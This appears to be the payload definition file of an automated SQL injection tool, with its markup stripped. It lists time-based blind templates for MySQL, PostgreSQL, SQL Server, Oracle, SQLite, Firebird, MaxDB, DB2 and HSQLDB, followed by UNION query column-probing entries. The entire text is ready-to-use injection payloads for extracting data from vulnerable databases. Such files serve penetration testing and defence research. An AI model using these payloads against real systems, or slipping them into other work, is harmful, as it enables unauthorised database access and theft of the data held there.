MySQL >= 5.0 time-based blind - Parameter replace 5 3 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
MySQL >= 5.0
MySQL < 5.0 time-based blind - Parameter replace (heavy queries) 5 4 2 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
MySQL
MySQL time-based blind - Parameter replace (bool*int) 5 4 1 1,2,3 3 ([INFERENCE])*SLEEP([SLEEPTIME]) ([RANDNUM]=[RANDNUM])*SLEEP([SLEEPTIME])
MySQL
MySQL time-based blind - Parameter replace (MAKE_SET) 5 5 1 1,2,3 3 MAKE_SET([INFERENCE],SLEEP([SLEEPTIME])) MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
MySQL
MySQL time-based blind - Parameter replace (ELT) 5 5 1 1,2,3 3 ELT([INFERENCE],SLEEP([SLEEPTIME])) ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
MySQL
PostgreSQL > 8.1 time-based blind - Parameter replace 5 3 1 1,2,3 3 (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
PostgreSQL > 8.1
PostgreSQL time-based blind - Parameter replace (heavy query) 5 4 2 1,2,3 3 (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
PostgreSQL
Microsoft SQL Server/Sybase time-based blind - Parameter replace 5 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
Microsoft SQL Server Sybase Windows
Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries) 5 4 2 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))
Microsoft SQL Server Sybase Windows
Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP) 5 3 0 1,3 3 BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END; BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;
Oracle
Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE) 5 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)
Oracle
Oracle time-based blind - Parameter replace (heavy queries) 5 4 2 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)
Oracle
SQLite > 2.0 time-based blind - Parameter replace (heavy query) 5 4 2 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)) (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))))
SQLite > 2.0
Firebird time-based blind - Parameter replace (heavy query) 5 5 2 1,2,3 3 IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) (SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
Firebird >= 2.0
SAP MaxDB time-based blind - Parameter replace (heavy query) 5 5 2 1,3 3 (SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) (SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
SAP MaxDB
IBM DB2 time-based blind - Parameter replace (heavy query) 5 5 2 1,2,3 3 (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
IBM DB2
HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query) 5 4 2 1,2,3 1 (SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
HSQLDB >= 1.7.2
HSQLDB > 2.0 time-based blind - Parameter replace (heavy query) 5 5 2 1,2,3 1 (SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0))) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))
HSQLDB > 2.0
MySQL >= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses 5 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
MySQL >= 5.0.11
MySQL < 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query) 5 4 2 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
MySQL
PostgreSQL > 8.1 time-based blind - GROUP BY and ORDER BY clauses 5 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))
PostgreSQL > 8.1
PostgreSQL time-based blind - GROUP BY and ORDER BY clauses (heavy query) 5 4 2 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))
PostgreSQL
Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses 5 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
Microsoft SQL Server Sybase Windows
Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query) 5 4 2 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
Microsoft SQL Server Sybase Windows
Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_LOCK.SLEEP) 5 3 0 2,3 1 ,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;) ,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)
Oracle
Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE) 5 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
Oracle
Oracle time-based blind - GROUP BY and ORDER BY clauses (heavy query) 5 4 2 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
Oracle
HSQLDB >= 1.7.2 time-based blind - GROUP BY and ORDER BY clauses (heavy query) 5 4 2 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS) --
HSQLDB >= 1.7.2
HSQLDB > 2.0 time-based blind - GROUP BY and ORDER BY clauses (heavy query) 5 4 2 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0))) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))
HSQLDB > 2.0
MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom) 3 1 1 1,2,3,4,5 1 [UNION] # [CHAR] [COLSTART]-[COLSTOP]
MySQL
MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom) 3 1 1 1,2,3,4,5 1 [UNION] # NULL [COLSTART]-[COLSTOP]
MySQL
MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom) 3 3 1 1,2,3,4,5 1 [UNION] # [RANDNUM] [COLSTART]-[COLSTOP]
MySQL
MySQL UNION query ([CHAR]) - 1 to 10 columns 3 1 1 1,2,3,4,5 1 [UNION] # [CHAR] 1-10
MySQL
MySQL UNION query (NULL) - 1 to 10 columns 3 1 1 1,2,3,4,5 1 [UNION] # NULL 1-10
MySQL
MySQL UNION query ([RANDNUM]) - 1 to 10 columns 3 3 1 1,2,3,4,5 1 [UNION] # [RANDNUM] 1-10
MySQL
MySQL UNION query ([CHAR]) - 11 to 20 columns 3 2 1 1,2,3,4,5 1 [UNION] # [CHAR] 11-20
MySQL
MySQL UNION query (NULL) - 11 to 20 columns 3 2 1 1,2,3,4,5 1 [UNION] # NULL 11-20
MySQL
MySQL UNION query ([RANDNUM]) - 11 to 20 columns 3 3 1 1,2,3,4,5 1 [UNION] # [RANDNUM] 11-20
MySQL
MySQL UNION query ([CHAR]) - 21 to 30 columns 3 3 1 1,2,3,4,5 1 [UNION] # [CHAR] 21-30
MySQL
MySQL UNION query (NULL) - 21 to 30 columns 3 3 1 1,2,3,4,5 1 [UNION] # NULL 21-30
MySQL
MySQL UNION query ([RANDNUM]) - 21 to 30 columns 3 4 1 1,2,3,4,5 1 [UNION] # [RANDNUM] 21-30
MySQL
MySQL UNION query ([CHAR]) - 31 to 40 columns 3 4 1 1,2,3,4,5 1 [UNION] # [CHAR] 31-40
MySQL
MySQL UNION query (NULL) - 31 to 40 columns 3 4 1 1,2,3,4,5 1 [UNION] # NULL 31-40
MySQL
MySQL UNION query ([RANDNUM]) - 31 to 40 columns 3 5 1 1,2,3,4,5 1 [UNION] # [RANDNUM] 31-40
MySQL
MySQL UNION query ([CHAR]) - 41 to 50 columns 3 5 1 1,2,3,4,5 1 [UNION] # [CHAR] 41-50
MySQL
MySQL UNION query (NULL) - 41 to 50 columns 3 5 1 1,2,3,4,5 1 [UNION] # NULL 41-50
MySQL
MySQL UNION query ([RANDNUM]) - 41 to 50 columns 3 5 1 1,2,3,4,5 1 [UNION] # [RANDNUM] 41-50
MySQL
Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom) 3 1 1 1,2,3,4,5 1 [UNION] -- [CHAR] [COLSTART]-[COLSTOP] Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom) 3 1 1 1,2,3,4,5 1 [UNION] -- NULL [COLSTART]-[COLSTOP] Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom) 3 3 1 1,2,3,4,5 1 [UNION] -- [RANDNUM] [COLSTART]-[COLSTOP] Generic UNION query ([CHAR]) - 1 to 10 columns 3 1 1 1,2,3,4,5 1 [UNION] -- [CHAR] 1-10 Generic UNION query (NULL) - 1 to 10 columns 3 1 1 1,2,3,4,5 1 [UNION] -- NULL 1-10 Generic UNION query ([RANDNUM]) - 1 to 10 columns 3 3 1 1,2,3,4,5 1 [UNION] -- [RANDNUM] 1-10 Generic UNION query ([CHAR]) - 11 to 20 columns 3 2 1 1,2,3,4,5 1 [UNION] -- [CHAR] 11-20 Generic UNION query (NULL) - 11 to 20 columns 3 2 1 1,2,3,4,5 1 [UNION] -- NULL 11-20 Generic UNION query ([RANDNUM]) - 11 to 20 columns 3 3 1 1,2,3,4,5 1 [UNION] -- [RANDNUM] 11-20 Generic UNION query ([CHAR]) - 21 to 30 columns 3 3 1 1,2,3,4,5 1 [UNION] -- [CHAR] 21-30 Generic UNION query (NULL) - 21 to 30 columns 3 3 1 1,2,3,4,5 1 [UNION] -- NULL 21-30 Generic UNION query ([RANDNUM]) - 21 to 30 columns 3 4 1 1,2,3,4,5 1 [UNION] -- [RANDNUM] 21-30 Generic UNION query ([CHAR]) - 31 to 40 columns 3 4 1 1,2,3,4,5 1 [UNION] -- [CHAR] 31-40 Generic UNION query (NULL) - 31 to 40 columns 3 4 1 1,2,3,4,5 1 [UNION] -- NULL 31-40 Generic UNION query ([RANDNUM]) - 31 to 40 columns 3 5 1 1,2,3,4,5 1 [UNION] -- [RANDNUM] 31-40 Generic UNION query ([CHAR]) - 41 to 50 columns 3 5 1 1,2,3,4,5 1 [UNION] -- [CHAR] 41-50 Generic UNION query (NULL) - 41 to 50 columns 3 5 1 1,2,3,4,5 1 [UNION] -- NULL 41-50 Generic UNION query ([RANDNUM]) - 41 to 50 columns 3 5 1 1,2,3,4,5 1 [UNION] -- [RANDNUM] 41-50